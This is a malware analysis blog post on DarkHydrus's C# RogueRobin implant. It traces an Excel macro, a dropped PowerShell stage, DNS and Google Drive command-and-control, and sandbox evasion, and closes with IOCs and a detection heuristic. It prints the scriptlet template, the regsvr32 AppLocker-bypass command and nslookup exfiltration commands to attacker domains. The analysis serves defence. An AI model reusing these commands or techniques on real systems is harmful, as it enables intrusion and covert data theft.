Analyzing the “New” Tools of DarkHydrus

You may remember I wrote about the DarkHydrus APT a while ago, and how their Powershell malware, RogueRobin, was being used to target Middle Eastern organizations and exfiltrate data over DNS. They have resurfaced after a dormant period, bringing a newly improved and compiled version of RogueRobin discovered by Unit 42, containing a modified communication method – in addition to communicating over DNS, this C# version of RogueRobin can be switched to Google Drive for communicating with its C2 servers.

I will be examining the three stages in this particular infection routine (Excel Document-> Powershell Script-> RogueRobin) and explaining how each stage functions. As per usual, the first and third stages have been uploaded to VirusBay. Let’s get analyzing.

First Stage: Excel Document (MD5): 89e50d52e498c34f1e976cf9a1017a39

The first stage of this infection routine begins with an Excel Document, which unsurprisingly contains malicious macros. The Excel Document referenced in this analysis is completely blank, possibly giving the receiving user the impression that macros need to be enabled to view the content. Upon clicking Enable Macros, the macro Workbook_Open() is called, which simply calls the only other macro that is embedded within this document – New_Macro().

Briefly scanning the contents of New_Macro(), we can see there is a Powershell script stored in the variable str. A WScript.Shell object is created and used to get the full path to %TEMP%, and the filename \WINDOWSTEMP.ps1 is appended to that path. A Scripting.FileSystemObject is then created, the text file %TEMP%\WINDOWSTEMP.ps1 is created, and the data stored in str is written to it.

The macro then creates a powershell command that executes a file, passing the path to the newly created file as an argument to it.

powershell.exe -noexit -exec bypass -File %TEMP%\\WINDOWSTEMP.ps1

Next, the macro creates a Script Component File that is located in the %TEMP% directory, with the filename 12-B-366.txt. The following data is written to the text file.

<?XML version=""1.0""?>
<scriptlet>
<registration progid = ""PoC"" classid=""{F0001111-0000-0000-0000-0000FEEDACDC}"" >
<script language=""JScript"">
<![CDATA[ var r = new ActiveXObject(""WScript.Shell"").Run(""" + powershell_command + """,0,true); ]]>
</script>
</registration>
</scriptlet>

In the file, powershell_command refers to the command that executes WINDOWSTEMP.ps1. Once this file has been written to %TEMP%, the macro performs an AppLocker bypass (AppLocker being the Windows application whitelisting feature). It does so by executing the command:

regsvr32.exe /s /n /u /i:%TEMP%\\12-B-366.txt scrobj.dll

regsvr32.exe is able to execute 12-B-366.txt because it is a Script Component File. This bypass was discovered by Casey Smith (@subTee), and it works because the code inside the <registration> element executes when regsvr32.exe is called. You can find a lot more about it here. As regsvr32.exe is a legitimately signed Microsoft binary, it is highly unlikely to be blacklisted. Interestingly enough, the scriptlet DarkHydrus utilizes is almost a carbon copy of the PoC produced by Casey – they simply altered what was being executed.
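From a defender's point of view, the command line used for this bypass is fairly distinctive. The snippet below is a minimal sketch of a heuristic that flags it. The function name is my own, and the rule is an assumption about what is worth flagging rather than a complete detection.

```python
import re


def looks_like_scriptlet_abuse(command_line: str) -> bool:
    """Heuristic: regsvr32 invoked with scrobj.dll and an /i: target."""
    lowered = command_line.lower()
    # Both the binary and the scriptlet runtime DLL must be present
    if "regsvr32" not in lowered or "scrobj.dll" not in lowered:
        return False
    # /i:<target> is where the scriptlet location is handed over
    return re.search(r"/i:\S+", lowered) is not None


print(looks_like_scriptlet_abuse(
    r"regsvr32.exe /s /n /u /i:%TEMP%\12-B-366.txt scrobj.dll"))
```

Running this over process creation logs would surface the first stage described above, although a legitimate administrative use of scrobj.dll would be flagged as well.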

Now that we have an understanding of the first stage used by DarkHydrus to gain a foothold into organizations, let’s check out the Powershell script written to WINDOWSTEMP.ps1.

Second Stage: Powershell Script

As seen in the macros, the powershell script contains a large chunk of Base64 encoded data, which is also compressed using GZIP. Scrolling to the bottom of the script, we can see that $byteArray is being filled with the Base64 decoded data, and then being stored in a new memory stream. GZIP Decompression is then performed on the new memory stream, with the result being copied to the memory stream $output, which is converted to an array and stored in $byteOutArray. The data is then written to $env:APPDATA\Microsoft\Windows\Templates\, under the filename WindowsTemplate.exe, before being executed by iex.

Once the file has been executed, a shortcut is created and stored in the Startup folder, under the name OneDrive.lnk, and as a result we can determine this is the persistence mechanism used for RogueRobin.

So, we know how the script works, but we haven’t yet seen the executable that is extracted, because it’s encoded and compressed. We can easily extract the payload using Python. All you need to do is copy the encoded data to a new file, and run the following script:

import base64
import gzip

# Read the Base64 text that was copied out of WINDOWSTEMP.ps1
with open("payload.bin", "rb") as f:
    encoded = f.read()

# Base64-decode the data, then GZIP-decompress it in memory
decompressed = gzip.decompress(base64.b64decode(encoded))

# Overwrite the file with the extracted executable
with open("payload.bin", "wb") as f:
    f.write(decompressed)

Once you have run the script, you should be left with a .NET executable, which is the final stage of the infection: RogueRobin.
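A quick sanity check on the extracted file is to confirm it starts with the MZ header and to compare its MD5 against the final-stage hash given in this post. This is just a small sketch; the helper name describe_payload is hypothetical.

```python
import hashlib

# Final-stage MD5 as listed in this post
EXPECTED_MD5 = "c3b1bd4e3e159591d84e77452a09851d"


def describe_payload(data: bytes) -> dict:
    """Report whether the data looks like a PE file and what its MD5 is."""
    md5 = hashlib.md5(data).hexdigest()
    return {
        "is_pe": data[:2] == b"MZ",       # DOS header magic of a PE file
        "md5": md5,
        "matches_post": md5 == EXPECTED_MD5,
    }
```

Calling describe_payload() on the bytes read from payload.bin should report is_pe as True if the extraction worked.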

Final Stage: RogueRobin EXE (MD5): c3b1bd4e3e159591d84e77452a09851d

Compared to the original Powershell RogueRobin, not much has changed except for the communication method, and the fact that it has been written in C#. As a result, I will be using dnSpy to statically analyze this payload. Interestingly enough, the compilation name for this executable was DNSProject.exe.

In this binary, the first function to be executed is Main(). This function checks if the predefined variable sandboxEvision_controler is True, which in this sample it is not. If it is True, the function sandBoxEvasion() is executed. It then checks to see if the next predefined variable hasStartup is True, which, again, is set to False. If it is True, the function startup() is called. Next, queryTypesTest() is called, passing 3 arguments: “ALL”, “2”, and 120. Finally, handler() is called, before the program exits.

sandBoxEvasion()

This function utilizes WMI in order to gather system information to determine if the malware is running in a sandbox or virtual machine. In order to do so, it contains several plaintext gwmi commands, just like the original RogueRobin, which are then executed in a function called powershell(), which simply executes the command and returns the standard output. If the malware detects it is running in a VM or sandbox, it will exit immediately. The different checks that are performed can be seen below.

1. Checks SMBIOSBIOSVERSION to see if it contains these strings:
        - VBOX
        - bochs
        - qemu 
        - VirtualBox
        - VM
        - XEN
2. Checks win32_computersystem to see if it matches "VMWare"
3. Checks to see if the TotalPhysicalMemory is larger than 2900 MB (a smaller value is treated as a sandbox)
4. Checks to see if the number of cores is higher than 1 (a single core is treated as a sandbox)
5. Checks to see if Wireshark or SysInternals are running
6. Checks to see if Debugger is attached

If all checks are successful and there are no traces of a sandbox or virtual machine, the function simply returns.
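To make the decision logic easier to follow, here is a rough model of the checks as a pure function over already-collected facts. It does not query WMI. The HostFacts structure, the case-insensitive matching and the way running tools are named are all my assumptions, not something taken from the sample.

```python
from dataclasses import dataclass

# Strings searched for in SMBIOSBIOSVERSION, as listed above
VM_BIOS_MARKERS = ("VBOX", "bochs", "qemu", "VirtualBox", "VM", "XEN")


@dataclass
class HostFacts:
    bios_version: str
    computer_system: str
    total_memory_mb: int
    cores: int
    running_tools: tuple = ()
    debugger_attached: bool = False


def looks_like_sandbox(host: HostFacts) -> bool:
    """Return True if any of the six checks would trip (simplified model)."""
    bios = host.bios_version.lower()
    if any(marker.lower() in bios for marker in VM_BIOS_MARKERS):
        return True
    if "vmware" in host.computer_system.lower():
        return True
    if host.total_memory_mb <= 2900:   # not larger than 2900 MB
        return True
    if host.cores <= 1:                # not more than one core
        return True
    tools = {tool.lower() for tool in host.running_tools}
    if tools & {"wireshark", "sysinternals"}:
        return True
    return host.debugger_attached
```

A typical analysis VM with one core and 2 GB of RAM trips checks 3 and 4 before the BIOS strings even matter, which is worth keeping in mind when setting up a lab for this sample.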

startup()

This function simply performs what the second stage performed – it copies itself to the %APPDATA% folder under the name OneDrive.exe, and then creates OneDrive.lnk in the Startup folder, which points to OneDrive.exe. As the second stage already performed this, we can assume this is why the variable hasStartup was set to False.

queryTestTypes()

The third argument in this function, named waiting, determines whether or not the program will exit – if it is higher than 7200, the program will exit. The first argument is compared to the string “ALL” – if it matches, the malware will loop through each DNS query type (TXT, SOA, MX, CNAME, SRV, A, AC, AAAA) and attempt to contact its C2 servers by calling the function query(). A check is done to see if the variable ID contains any data, and if the length is equal to 2. If it is, query() is called with the first argument being a string derived from the program ID. To build it, the ID is passed through the function number_to_word(), which converts the numbers 0-9 to letters:

Number    Letter Representation
0         h
1         i
2         j
3         k
4         l
5         m
6         r
7         o
8         p
9         q

The letter b is prepended to the created string, and the letter c is appended to the string. If the ID is shorter than 2, the malware retrieves the current process ID (which is converted to a string, just like the program ID), and query() is called with the created string having the letter a prepended to the string. Therefore, the resulting string could look like this: amkjc.
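The encoding described above is easy to reproduce when you want to decode subdomains seen in DNS logs. The following is a small sketch using the digit mapping from the table. The names build_label and word_to_number are mine, and the assumption that c is appended in both cases comes from the amkjc example.

```python
# Digit-to-letter mapping exactly as listed in the table
DIGIT_TO_LETTER = dict(zip("0123456789", "hijklmropq"))
LETTER_TO_DIGIT = {letter: digit for digit, letter in DIGIT_TO_LETTER.items()}


def number_to_word(number) -> str:
    """Convert each digit of the number to its letter."""
    return "".join(DIGIT_TO_LETTER[digit] for digit in str(number))


def build_label(value, has_id: bool) -> str:
    """'b' + encoded ID + 'c' when an ID exists, else 'a' + encoded PID + 'c'."""
    prefix = "b" if has_id else "a"
    return prefix + number_to_word(value) + "c"


def word_to_number(label: str) -> str:
    """Reverse the encoding for a label such as 'amkjc'."""
    return "".join(LETTER_TO_DIGIT[letter] for letter in label[1:-1])


print(build_label(532, has_id=False))  # amkjc
print(word_to_number("amkjc"))         # 532
```

So the example string amkjc corresponds to a process with PID 532 that has not yet been assigned an ID.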

The return value from query() is stored in the variable text3. This is checked against the string $$FALSE$$, and if it matches, the query type is added to an array in the format {query_type}:0. If text3 doesn’t equal $$FALSE$$, the query type is added to the array in the format {query_type}:1. Next, a check is done once again for the length of the program ID. If it is less than 1, the function magic() is called, with the argument being getid.

Once the malware has finished looping over each query type, it checks the length of the ID once again. If it is still less than 2, it indicates that no connections to the C2 servers were successful, so it calls queryTestTypes() once again, except it multiplies the value in the third argument, waiting, by 2. Starting from 120, waiting takes the values 120, 240, 480, 960, 1920 and 3840, so the function will be executed a total of 6 times – on the next call the value of waiting is 7680, which is higher than 7200, and so the program will exit.

The last query type used that resulted in a successful connection will be set as the default, and stored in the global variable mode. The function spliting() is called, with the first argument being the return value of myInfo(). It is then called once more, passing the list of tested query types as the first argument. The function will then return back to the main function.

query()

This function is responsible for all of the DNS communication to the C2 servers. The second argument that query() accepts is the query type to use. The third and fourth arguments are bools, so they are either True or False. The third argument determines whether the malware is just testing connections to the C2 servers, or exfiltrating data to a selected server. The fourth argument determines whether the malware should use a specific DNS query type for communication, or change it on the fly using the round_robin() function, which, as you may have guessed, is where the name RogueRobin came from.

Before DNS communication begins, RogueRobin executes the following command to flush the DNS cache:

ipconfig /flushdns

Once the command has been executed, the malware executes the round_robin() function, passing the list of C2 domains as the first argument, and the currently selected domain as the second argument. Before this function is called for the first time, the currently selected domain is equal to the first entry in the domain list. The list of C2 domains embedded in this sample can be seen below.

C2 Domains (in same order as the sample):
	- 0ffice365.agency
	- 0nedrive.agency
	- corewindows.agency
	- microsoftonline.agency
	- onedrive.agency
	- sharepoint.agency
	- skydrive.agency
	- 0ffice365.life
	- 0ffice365.services
	- skydrive.services

Next, if change_mode (fourth argument) is true, round_robin() is executed, and the query type is changed based on the return value. The possible queries can be seen below.

DNS Queries (in same order as the sample):
	- TXT
	- SOA
	- MX
	- CNAME
	- SRV
	- A
	- AC (AC is not a valid query type, and is used to request a subdomain using the A query type)
	- AAAA

From there, RogueRobin checks to see if the query type is AC, and if it is, the global variable useAC is set to true, and the query type is set to A.

The variable text3 can contain one of three commands that will be executed by the powershell() function. In order to communicate over DNS, just like the last version of RogueRobin, nslookup.exe is utilized, which is a legitimate Windows binary. All three commands can be seen below.

Regular Query: nslookup.exe -timeout=10 -q=MX amkjc.0ffice365.agency
If useAC = True: nslookup.exe -timeout=10 -q=MX amkjc-dj.0ffice365.agency
If Debugger is attached: nslookup.exe -timeout=10 -q=MX 676f6f646c75636b.ac.gogle.co

Interestingly enough, converting the string 676f6f646c75636b from hex will reveal the string goodluck, as if the authors behind the malware were leaving a note for any analysts reversing the sample, as this section of code will only trigger if a debugger is attached to the sample.
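If you want to check the conversion yourself, it is a one-liner in Python:

```python
# Decode the hex label used when a debugger is attached
decoded = bytes.fromhex("676f6f646c75636b").decode("ascii")
print(decoded)  # goodluck
```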

Next, the command stored in text3 is executed, with the returned data being stored in text. This data is then analyzed to see if any of the cancel_domains appear – these domains are listed below. If any matches are discovered, the string cancel will be returned.

Cancel Domains:
	- 216.58.192.174 
	- 2a00:1450:4001:81a::200e
	- 2200::
	- download.microsoft.com
	- ntservicepack.microsoft.com
	- windowsupdate.microsoft.com
	- update.microsoft.com

If the function hasn’t exited, two more regex tests are performed on the response. The first checks for a match against the strings timeout, UnKnown can and Unspecified error; the second checks for a match against the strings canonical name, mx, namerserver, mail server and address. If there is a match on the first test, the variable flag (automatically set to True after receiving a response) is set to False. If there is a match on the second test, flag is set to True.

If the third argument (is_test) is True and flag is false, the function will break from the loop and return $$FALSE$$. If it has not returned, the function checks to see if a debugger is present once again, and if it is, flag is set to False and the loop continues. If flag is set to True, it will return the response in lower case.
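The response handling described above can be modelled roughly as follows. This is a simplified sketch, not the sample's code: the exact regex syntax, the case-insensitive matching and the return labels "ok" and "failed" are my assumptions (the real function returns cancel, $$FALSE$$ or the lower-cased response).

```python
import re

CANCEL_MARKERS = (
    "216.58.192.174", "2a00:1450:4001:81a::200e", "2200::",
    "download.microsoft.com", "ntservicepack.microsoft.com",
    "windowsupdate.microsoft.com", "update.microsoft.com",
)
# Strings taken from the analysis; "namerserver" is spelled as reported
FAILURE_RE = re.compile(r"timeout|UnKnown can|Unspecified error", re.IGNORECASE)
SUCCESS_RE = re.compile(
    r"canonical name|mx|namerserver|mail server|address", re.IGNORECASE)


def classify_response(response: str) -> str:
    """Return 'cancel', 'ok' or 'failed' for an nslookup response (model only)."""
    if any(marker in response for marker in CANCEL_MARKERS):
        return "cancel"
    flag = True                      # set to True once a response arrives
    if FAILURE_RE.search(response):
        flag = False
    if SUCCESS_RE.search(response):  # evaluated second, so it wins on overlap
        flag = True
    return "ok" if flag else "failed"
```

Because the second test runs after the first, a response that matches both sets of strings still ends up with flag set to True.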

round_robin()

This function simply iterates over a list by getting the index of a string in an array, and then incrementing that index by 1. Next, the incremented value is compared against the size of the array, and if it is greater than or equal to the size of the array, it is set to 0. The return value is array[incremented value], where array is the first argument, and incremented value is the index of the second argument plus 1.
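In Python, the same wrap-around selection looks like this. It is a sketch of the logic as described, not a translation of the decompiled C#.

```python
QUERY_TYPES = ["TXT", "SOA", "MX", "CNAME", "SRV", "A", "AC", "AAAA"]


def round_robin(items: list, current: str) -> str:
    """Return the entry after `current`, wrapping to the first entry."""
    index = items.index(current) + 1
    if index >= len(items):
        index = 0
    return items[index]


print(round_robin(QUERY_TYPES, "TXT"))   # SOA
print(round_robin(QUERY_TYPES, "AAAA"))  # TXT
```

The same function works for both the query type list and the C2 domain list, which matches how it is called from query().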

myInfo()

This function is responsible for retrieving system information to send back to the C2 server. It first gathers the internal IP Address, before getting the domain which the computer is located on using WMI commands. Next, it gets the username of the current user, and the host name of the computer. Finally, it checks the privileges of the user. The values are joined with the | character, resulting in a string that looks similar to the one below.

127.0.0.1|WORKGROUP|Username|Hostname|False|0|0|1|3|25|cs

The functions I have mentioned are the functions that are quite important in this binary – now I have gone over them, I will be focusing on the Google Drive C2 communications that RogueRobin uses. If you want to know more about the other functions that I haven’t mentioned, you can check out my old post here on their Powershell variant of RogueRobin. You can also check out Unit 42’s (the group that discovered this new variant) great analysis on this C# variant here.

Google Drive Capabilities

tl;dr:
- gat() - Get OAuth 2.0 Access Token
- gdd() - Download File from Google Drive
- gdmd_t() - Get Last Modified Time from File
- gdr() - Delete File from Google Drive
- gd_u() - Modify Existing File
- gd_uu() - Create New File and Upload Data to it

Since the previous powershell variant, a new command has been added to the command handler – \^$x_mode. The global variable x_mode is set as False by default, however upon receiving the x_mode command over DNS, the malware will set x_mode as True, and as a result, communications will occur through Google Drive rather than over DNS. Alongside the \^$x_mode command, 7 values will be included in the string, which are split with \r, \n, or \r\n. If the second item in this array (the split string) is equal to OFF, the malware returns back to using DNS for communication – otherwise, the second value is stored in the global variable gdu.

In order to figure out what each variable is used for, we can simply CTRL+F the variable we are looking at to find other instances of it. For example, the variable gdu is used in the function gdmd_t(), which calls WebClient.DownloadData(), and checks to see when the file was modified last using a regex query on the response data. This time is then returned back to the calling function. In this function, gdu is being used as the Drive URL, and so array[1] is equal to the Google Drive URL.

The variable gduu is used in the function gd_uu(), which calls WebClient.UploadData() twice. The first time, it is passing gduu as the first argument, and bytes2 as the second argument. bytes2 contains the variable file_name, and the response of calling UploadData() is stored in the variable address – which is then passed as the first argument in the second call to UploadData(). Based on this, we can determine that first the malware sends a request to Google Drive to create a file (file_name) in the drive (gduu), to which Google Drive responds with information including the URL to that file. This URL is then used to upload the data to that file.

The next variable is gdo2t, which is used in the function gat(). When looking through this function, it is clear that it has something to do with an access token, as the response from WebClient.UploadValues() is stored in the variable ac_t, only after a regex check for access_token has been performed. A quick search for “google drive access token” shows that Google Drive allows API access using OAuth 2.0 tokens, which also explains the variable name: gdo2t reads as Google Drive OAuth 2.0 token. So this function simply retrieves the OAuth 2.0 token in order to utilize the Google Drive API, and gdo2t contains the URL used to retrieve that token.

The next variable, client_id, is also used in the function gat(). This is added to the POST data that is sent to the URL in order to get the OAuth Token. This is the same for the variable cs, which contains the client secret for the application – which is created alongside the client ID when the authors of this malware registered for API access using the Google API Console – and the variable r_t, which contains the refresh token. This refresh token allows the malware to get new access tokens when the previous one has run out. You can learn more about Google API here.
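For reference, a standard OAuth 2.0 refresh request is a form-encoded POST carrying the client ID, client secret, refresh token and a grant_type of refresh_token. The sketch below builds such a body and pulls access_token out of a response without touching the network. I am assuming the sample sends the standard field names; the regex is my own and not the one used in the binary.

```python
import re
from urllib.parse import urlencode


def build_token_request(client_id: str, client_secret: str, refresh_token: str) -> bytes:
    """Form-encoded body for a standard OAuth 2.0 refresh-token grant."""
    fields = {
        "client_id": client_id,
        "client_secret": client_secret,
        "refresh_token": refresh_token,
        "grant_type": "refresh_token",
    }
    return urlencode(fields).encode("ascii")


def extract_access_token(response_body: str):
    """Return the access_token value from a JSON response, or None."""
    match = re.search(r'"access_token"\s*:\s*"([^"]+)"', response_body)
    return match.group(1) if match else None
```

In network captures, a POST with these fields followed by Drive API calls from an unexpected process is a reasonable thing to hunt for.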

Finally, the last variable to be filled is gdue. This is used in the function gd_u(), which is different to gd_uu(), as it updates an existing file, rather than creating a brand new one. gdue contains the URL to the drive to update, and then the variable file_id is appended to the URL, to get access to a specific file. The malware then simply calls WebClient.UploadData() after retrieving the file location URL from the headers of the Google Drive response.
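Putting the seven values together, the x_mode command can be parsed along these lines. Note that the field order here simply follows the order I walked through the variables above, which is an assumption, and the first line of the command is treated as an opaque marker.

```python
import re
from typing import Optional

# Assumed order of the seven values following the command marker
FIELD_ORDER = ("gdu", "gduu", "gdo2t", "client_id", "cs", "r_t", "gdue")


def parse_x_mode(command: str) -> Optional[dict]:
    """Split on \\r\\n, \\r or \\n; return None when x_mode is switched OFF."""
    parts = re.split(r"\r\n|\r|\n", command)
    if len(parts) < 2 or parts[1] == "OFF":
        return None  # malware falls back to DNS
    return dict(zip(FIELD_ORDER, parts[1:]))
```

A return value of None corresponds to the malware going back to DNS, while a dictionary corresponds to the global variables being filled.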

Now to look at any functions involved in the Google Drive communications that I haven’t mentioned.

gdr()

gdr() is used to delete a file based on the file ID passed to it. It sends a DELETE request to Google Drive, passing the URL to the file that will be deleted.

gdd()

gdd() is used to download a file from Google Drive, accepting the file ID as the only argument. Unlike gdmd_t(), this function returns the downloaded data, instead of the modified time.

Now we know what each function does, we can easily understand how the handler() function operates.

If x_mode is set to True, the Google Drive branch of handler() will execute. First, gat() is called, which will retrieve the OAuth 2.0 Token so that communications with Google Drive can begin. Next, the malware checks to see if the global variable f_id is empty or not. If it is empty, gd_uu() is called, which will create a file using the process ID, with the .txt extension. The data uploaded to this file contains the process ID as a string and the currently selected domain from the C2 list.

gd_uu() returns the file ID of the newly created file, which is stored in f_id. Next, the variable modification_time is filled with the return value of gdmd_t(), which is the time the last modification was made to the file.

Next, update_f_id is checked to see if it is empty or not. If it is, gd_uu() is called again, except this time the data that is written to the file is simply the process ID, and the filename is simply the process ID plus -U.txt. The return value is then stored in update_f_id.

If update_f_id or f_id are equal to ERROR, gdr() is called to delete the file with the ID in f_id, and then to delete the file with the ID in update_f_id. These variables are then emptied, and the variable x_mode_error is incremented. If the value in this variable is more than 10, x_mode is set to False, meaning the communication methods resort back to DNS. The loop jumps back to the start.

If f_id and update_f_id do not equal ERROR, the loop resumes. The program calls gdmd_t() once again, storing the result in text3. This is then compared against the value in modification_time. If they match, gd_u() is called, with the second argument (the file ID to update) being update_f_id. An example of the data that is uploaded to the file can be seen below:

"b" + ID + "c" + 5 Random Characters + Current Domain

The loop then jumps back to the start. If the modification time has changed, modification_time is filled with the time in text3 and the file (ID: f_id) is downloaded using gdd(). The downloaded data is compared against the value ERROR. If it matches, x_mode_error is incremented, and once again, it is checked to see if it is larger than 10. If it is, x_mode is set to false, and the loop starts again. If they don’t match, the program begins to parse this command using several regex queries, before calling taskHandler() to execute the received command.
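The polling logic is easier to see as a small state machine. Below is a simplified model of a single pass through the loop once both files exist. The DriveState class, the returned action labels and the injected download callable (standing in for gdd()) are hypothetical names I am using for illustration.

```python
from dataclasses import dataclass

MAX_ERRORS = 10


@dataclass
class DriveState:
    modification_time: str
    x_mode: bool = True
    x_mode_error: int = 0


def poll_once(state: DriveState, current_mtime: str, download) -> str:
    """Model one loop pass; returns an illustrative label for the action taken."""
    if current_mtime == state.modification_time:
        # File unchanged: gd_u() would write a beacon to the -U.txt file
        return "heartbeat"
    state.modification_time = current_mtime
    data = download()  # stands in for gdd(f_id)
    if data == "ERROR":
        state.x_mode_error += 1
        if state.x_mode_error > MAX_ERRORS:
            state.x_mode = False  # resort back to DNS
        return "error"
    # taskHandler() would execute the parsed command here
    return "run_command"
```

In other words, the operators task an implant by editing its file on Google Drive, and the implant notices the change through the modification time.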

So that brings this analysis to a close – due to a slight change in plans, my post on ISFB will be released sometime in February (hopefully in the first or second week), along with another post I have been working on. As always, if you have any questions about this post or anything malware analysis related, don’t hesitate to contact me either through the site or on Twitter (@0verfl0w_). Also, if you want to be the first to know about any new posts that go public, make sure to subscribe below! Thanks again!

IOCs:
    - Hashes (MD5):
        - First Stage (Excel): 89e50d52e498c34f1e976cf9a1017a39
        - Final Stage (RogueRobin): c3b1bd4e3e159591d84e77452a09851d
    - Dropped Files:
        - %TEMP%\\WINDOWSTEMP.ps1
        - %TEMP%\\12-B-366.txt
        - %APPDATA%\\Microsoft\\Windows\\Templates\\WindowsTemplate.exe
        - %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrive.lnk
    - C2 Servers:
        - 0ffice365.agency
        - 0nedrive.agency
        - corewindows.agency
        - microsoftonline.agency
        - onedrive.agency
        - sharepoint.agency
        - skydrive.agency
        - 0ffice365.life
        - 0ffice365.services
        - skydrive.services
    - Cancel Domains:
        - 216.58.192.174
        - 2a00:1450:4001:81a::200e
        - 2200::
        - download.microsoft.com
        - ntservicepack.microsoft.com
        - windowsupdate.microsoft.com
        - update.microsoft.com

Author

0verfl0w_
